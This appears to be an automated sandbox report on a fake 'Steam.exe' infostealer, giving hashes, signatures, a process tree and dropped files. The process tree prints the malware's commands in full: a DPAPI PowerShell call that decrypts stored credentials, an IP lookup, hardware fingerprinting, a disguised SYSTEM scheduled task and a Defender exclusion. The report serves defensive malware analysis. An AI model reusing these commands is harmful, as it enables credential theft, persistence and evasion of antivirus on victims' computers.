Analysis

  • max time kernel
    4s
  • max time network
    10s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240221-en
  • resource tags

    arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    07-04-2024 19:44

General

  • Target

    Steam.exe

  • Size

    154.5MB

  • MD5

    8a3861c725d108eb0c1a17fa43f0487a

  • SHA1

    e4b713028e43e0f99e4568aa3902384b52951ed2

  • SHA256

    0177dec5005ce11309a54c49bc6a36c97008751db890b7bdf6c9eba48815acef

  • SHA512

    db3765823fd8bea6e6b1c17b8144038586e5089b20c6ee70e517cb5c864ec874f82cf08696cebb48b148683de3f6bea93b65d26c58f166a7bb3defd49e5dd3ad

  • SSDEEP

    1572864:UCquurbtqKajQe7vqrTU4PrCsdCXrBngPE1cG7VOWe2IkBmUgq3Fd6iU3x6VCdbm:eDAgZi

Score
7/10

Malware Config

Signatures

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Steam.exe
    "C:\Users\Admin\AppData\Local\Temp\Steam.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:4576
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4896
      • C:\Windows\system32\curl.exe
        curl http://api.ipify.org/ --ssl-no-revoke
        3⤵
          PID:852
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "tasklist"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:344
        • C:\Windows\system32\tasklist.exe
          tasklist
          3⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:648
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "tasklist"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4760
        • C:\Windows\system32\tasklist.exe
          tasklist
          3⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4528
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,1,230,209,96,183,3,147,71,187,153,213,196,88,17,142,74,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,142,201,190,236,119,164,249,229,41,6,194,37,239,167,184,163,113,143,87,88,255,118,110,201,100,66,207,20,108,252,227,68,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,117,182,249,61,2,159,110,24,25,13,161,36,186,14,75,78,120,216,53,125,15,64,189,193,186,132,116,79,103,202,186,94,48,0,0,0,152,140,232,44,188,166,20,101,3,247,171,153,99,3,74,178,253,152,73,92,23,31,142,140,189,199,211,146,124,26,26,111,64,189,223,72,118,238,118,127,166,126,39,230,8,162,176,235,64,0,0,0,180,244,68,231,242,166,178,241,72,22,15,194,14,178,91,91,84,8,166,233,155,101,48,41,247,47,79,140,45,53,245,186,235,199,214,238,172,241,176,13,60,70,213,189,216,77,98,203,211,240,139,15,138,215,20,227,41,204,192,211,179,39,141,8), $null, 'CurrentUser')"
        2⤵
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:3524
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,1,230,209,96,183,3,147,71,187,153,213,196,88,17,142,74,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,142,201,190,236,119,164,249,229,41,6,194,37,239,167,184,163,113,143,87,88,255,118,110,201,100,66,207,20,108,252,227,68,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,117,182,249,61,2,159,110,24,25,13,161,36,186,14,75,78,120,216,53,125,15,64,189,193,186,132,116,79,103,202,186,94,48,0,0,0,152,140,232,44,188,166,20,101,3,247,171,153,99,3,74,178,253,152,73,92,23,31,142,140,189,199,211,146,124,26,26,111,64,189,223,72,118,238,118,127,166,126,39,230,8,162,176,235,64,0,0,0,180,244,68,231,242,166,178,241,72,22,15,194,14,178,91,91,84,8,166,233,155,101,48,41,247,47,79,140,45,53,245,186,235,199,214,238,172,241,176,13,60,70,213,189,216,77,98,203,211,240,139,15,138,215,20,227,41,204,192,211,179,39,141,8), $null, 'CurrentUser')
          3⤵
            PID:2488
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,1,230,209,96,183,3,147,71,187,153,213,196,88,17,142,74,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,134,57,53,184,109,103,87,41,96,93,54,175,83,254,108,1,199,63,183,145,59,67,77,142,131,41,66,140,251,225,30,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,50,139,195,109,157,54,95,31,122,27,243,129,91,106,56,19,120,167,108,199,123,190,180,44,26,193,243,188,5,249,100,159,48,0,0,0,79,190,164,90,47,210,54,200,237,40,110,74,250,111,141,178,90,89,142,131,113,94,149,123,17,190,228,107,254,66,96,184,159,117,236,86,51,7,28,128,111,234,232,223,185,23,255,90,64,0,0,0,60,144,165,167,84,157,208,17,93,60,160,32,92,249,63,246,132,77,226,246,5,218,17,205,23,195,165,110,254,55,95,129,234,6,241,102,134,123,200,151,222,54,233,191,21,50,221,233,126,250,119,218,52,59,70,62,8,46,61,164,64,24,209,159), $null, 'CurrentUser')"
          2⤵
          • An obfuscated cmd.exe command-line is typically used to evade detection.
          PID:3156
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,1,230,209,96,183,3,147,71,187,153,213,196,88,17,142,74,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,134,57,53,184,109,103,87,41,96,93,54,175,83,254,108,1,199,63,183,145,59,67,77,142,131,41,66,140,251,225,30,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,50,139,195,109,157,54,95,31,122,27,243,129,91,106,56,19,120,167,108,199,123,190,180,44,26,193,243,188,5,249,100,159,48,0,0,0,79,190,164,90,47,210,54,200,237,40,110,74,250,111,141,178,90,89,142,131,113,94,149,123,17,190,228,107,254,66,96,184,159,117,236,86,51,7,28,128,111,234,232,223,185,23,255,90,64,0,0,0,60,144,165,167,84,157,208,17,93,60,160,32,92,249,63,246,132,77,226,246,5,218,17,205,23,195,165,110,254,55,95,129,234,6,241,102,134,123,200,151,222,54,233,191,21,50,221,233,126,250,119,218,52,59,70,62,8,46,61,164,64,24,209,159), $null, 'CurrentUser')
            3⤵
              PID:4852
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
            2⤵
              PID:4816
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic diskdrive get serialnumber
                3⤵
                  PID:2868
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
                2⤵
                  PID:2504
                  • C:\Windows\system32\reg.exe
                    reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
                    3⤵
                      PID:5040
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
                    2⤵
                      PID:1008
                      • C:\Windows\system32\schtasks.exe
                        schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
                        3⤵
                        • Creates scheduled task(s)
                        PID:3120
                    • C:\Users\Admin\AppData\Local\Temp\Steam.exe
                      "C:\Users\Admin\AppData\Local\Temp\Steam.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\Steam" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1712 --field-trial-handle=1960,i,12471839113151150774,27583312757680621,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
                      2⤵
                        PID:1828
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
                        2⤵
                          PID:3080
                          • C:\Windows\System32\Wbem\WMIC.exe
                            wmic bios get smbiosbiosversion
                            3⤵
                              PID:2188
                          • C:\Users\Admin\AppData\Local\Temp\Steam.exe
                            "C:\Users\Admin\AppData\Local\Temp\Steam.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\Steam" --mojo-platform-channel-handle=1288 --field-trial-handle=1960,i,12471839113151150774,27583312757680621,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
                            2⤵
                              PID:2736
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs""
                              2⤵
                                PID:3728
                                • C:\Windows\system32\cscript.exe
                                  cscript //nologo "C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs"
                                  3⤵
                                    PID:3088
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Steam\CheckEpicGamesLauncher.bat" "
                                      4⤵
                                        PID:2252
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
                                          5⤵
                                            PID:1412
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
                                      2⤵
                                        PID:1516
                                        • C:\Windows\System32\Wbem\WMIC.exe
                                          wmic baseboard get serialnumber
                                          3⤵
                                            PID:4176
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
                                          2⤵
                                            PID:664
                                            • C:\Windows\System32\Wbem\WMIC.exe
                                              wmic MemoryChip get /format:list
                                              3⤵
                                                PID:1228
                                              • C:\Windows\system32\find.exe
                                                find /i "Speed"
                                                3⤵
                                                  PID:4668
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
                                                2⤵
                                                  PID:2044
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    wmic path win32_computersystemproduct get uuid
                                                    3⤵
                                                      PID:1872
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /d /s /c "powershell wininit.exe"
                                                    2⤵
                                                      PID:1232
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell wininit.exe
                                                        3⤵
                                                          PID:4796
                                                          • C:\Windows\system32\wininit.exe
                                                            "C:\Windows\system32\wininit.exe"
                                                            4⤵
                                                              PID:3116

                                                      Network

                                                      MITRE ATT&CK Enterprise v15

                                                      Replay Monitor

                                                      Loading Replay Monitor...

                                                      Downloads

                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                        Filesize

                                                        3KB

                                                        MD5

                                                        f10a836b72e0bf0946a8e1cd5fadce2c

                                                        SHA1

                                                        586b63a56f0eb3e84be0cca2aa83a3ad66ad268e

                                                        SHA256

                                                        5e314ed17c2e2997a8ffde8d3d68a05004fb29659ad1a10e698f04462a9d69d5

                                                        SHA512

                                                        1ecfe04091c336147e372ea24defeeb0c965ad2a02f64e4c6f64edf25a1cf289b02456c782fd3a9a6f401f947fd07125c36c9bbcb5eff4ac11d2b99b5c3827fd

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        1KB

                                                        MD5

                                                        7a2b288b6516ace3c60a8b6718511f0a

                                                        SHA1

                                                        7783140c099db9de2dcc5d5fc4ac79105e41f707

                                                        SHA256

                                                        921c27cf4a64523fdcaa3f724a90a5f635da1f05541b7c6bcce9b5a892909ce9

                                                        SHA512

                                                        56d57c9c46be4fef39b6d1a0cc5b769eec05f42a08323b41c222096831be315009860d4bd3d7dc5833887845d11806cf2eef24ce7e24888c2c30777f6918974f

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        1KB

                                                        MD5

                                                        14bb94c36d909375f4a2c1163c1780fb

                                                        SHA1

                                                        02ff6e3a0293fe7428499390adacc96862e17d91

                                                        SHA256

                                                        e291bdfc4667f621131172b199039aa4147404efa429ad54482073b4e46c391a

                                                        SHA512

                                                        9241b39e96e443a40e9cb59b5db5f8e5724203742ecdad77f147bb59360fdf7d198ad49c44682d707fe3ab77b5cd01b1d9c27cfc8e3900ea2a99fad9a26cb0b6

                                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vzfzesfy.ged.ps1

                                                        Filesize

                                                        60B

                                                        MD5

                                                        d17fe0a3f47be24a6453e9ef58c94641

                                                        SHA1

                                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                        SHA256

                                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                        SHA512

                                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                      • C:\Users\Admin\AppData\Local\Temp\f1488582-d6b7-497c-9bf5-c48c7a80f6cf.tmp.node

                                                        Filesize

                                                        1.8MB

                                                        MD5

                                                        3072b68e3c226aff39e6782d025f25a8

                                                        SHA1

                                                        cf559196d74fa490ac8ce192db222c9f5c5a006a

                                                        SHA256

                                                        7fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01

                                                        SHA512

                                                        61ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61

                                                      • C:\Users\Admin\AppData\Roaming\Steam\CheckEpicGamesLauncher.bat

                                                        Filesize

                                                        1KB

                                                        MD5

                                                        79a5e87823b83ea148f718b5fe237ec9

                                                        SHA1

                                                        408431f7d062aef5017f2ce715b2da16a8585fa8

                                                        SHA256

                                                        0626a1ecba78a0d83bddf6fceb66ba490e5ba176516e496faec4c1b3e344e2a1

                                                        SHA512

                                                        2433d01f189a49a3155f46d494bc2a441faf0f29160d5709e92972d558afa22ac6bd71e089fbd7a19a39ca151f90b086d5cbb6e7f17f7460df35397cf73cf5a8

                                                      • C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs

                                                        Filesize

                                                        155B

                                                        MD5

                                                        849a5123f73771f6fe0e36056813e7cb

                                                        SHA1

                                                        ccf4436fccf38a27cabf2603e61557976dbe3b01

                                                        SHA256

                                                        e0388ef99c9337d7779c5cbca39cc51d558ca6aa2434f8d7e0794ae1cdb7c870

                                                        SHA512

                                                        1204530de2c24b8ce159ec95044b9cb065a8aab95143b73467ea67fc3756c08f9b782dc9934ab98cfdb27f33caa6f7157b7750763f78e5406c46533ec37f9ebd

                                                      • memory/1412-94-0x000001C9B4AA0000-0x000001C9B4AB0000-memory.dmp

                                                        Filesize

                                                        64KB

                                                      • memory/1412-93-0x00007FFEFB190000-0x00007FFEFBC52000-memory.dmp

                                                        Filesize

                                                        10.8MB

                                                      • memory/1412-73-0x000001C9B4AA0000-0x000001C9B4AB0000-memory.dmp

                                                        Filesize

                                                        64KB

                                                      • memory/1412-74-0x000001C9B4AA0000-0x000001C9B4AB0000-memory.dmp

                                                        Filesize

                                                        64KB

                                                      • memory/2488-14-0x00000251CA150000-0x00000251CA172000-memory.dmp

                                                        Filesize

                                                        136KB

                                                      • memory/2488-15-0x00007FFEFC6A0000-0x00007FFEFD162000-memory.dmp

                                                        Filesize

                                                        10.8MB

                                                      • memory/2488-22-0x00007FFEFC6A0000-0x00007FFEFD162000-memory.dmp

                                                        Filesize

                                                        10.8MB

                                                      • memory/2488-18-0x00000251CA210000-0x00000251CA260000-memory.dmp

                                                        Filesize

                                                        320KB

                                                      • memory/2488-17-0x00000251B1BC0000-0x00000251B1BD0000-memory.dmp

                                                        Filesize

                                                        64KB

                                                      • memory/2488-16-0x00000251B1BC0000-0x00000251B1BD0000-memory.dmp

                                                        Filesize

                                                        64KB

                                                      • memory/4796-72-0x000001DC0CC40000-0x000001DC0CC50000-memory.dmp

                                                        Filesize

                                                        64KB

                                                      • memory/4796-71-0x00007FFEFB190000-0x00007FFEFBC52000-memory.dmp

                                                        Filesize

                                                        10.8MB

                                                      • memory/4796-80-0x000001DC0CC40000-0x000001DC0CC50000-memory.dmp

                                                        Filesize

                                                        64KB

                                                      • memory/4852-40-0x00007FFEFC6A0000-0x00007FFEFD162000-memory.dmp

                                                        Filesize

                                                        10.8MB

                                                      • memory/4852-36-0x000001F1912C0000-0x000001F1912D0000-memory.dmp

                                                        Filesize

                                                        64KB

                                                      • memory/4852-37-0x000001F1912C0000-0x000001F1912D0000-memory.dmp

                                                        Filesize

                                                        64KB

                                                      • memory/4852-35-0x000001F1912C0000-0x000001F1912D0000-memory.dmp

                                                        Filesize

                                                        64KB

                                                      • memory/4852-33-0x00007FFEFC6A0000-0x00007FFEFD162000-memory.dmp

                                                        Filesize

                                                        10.8MB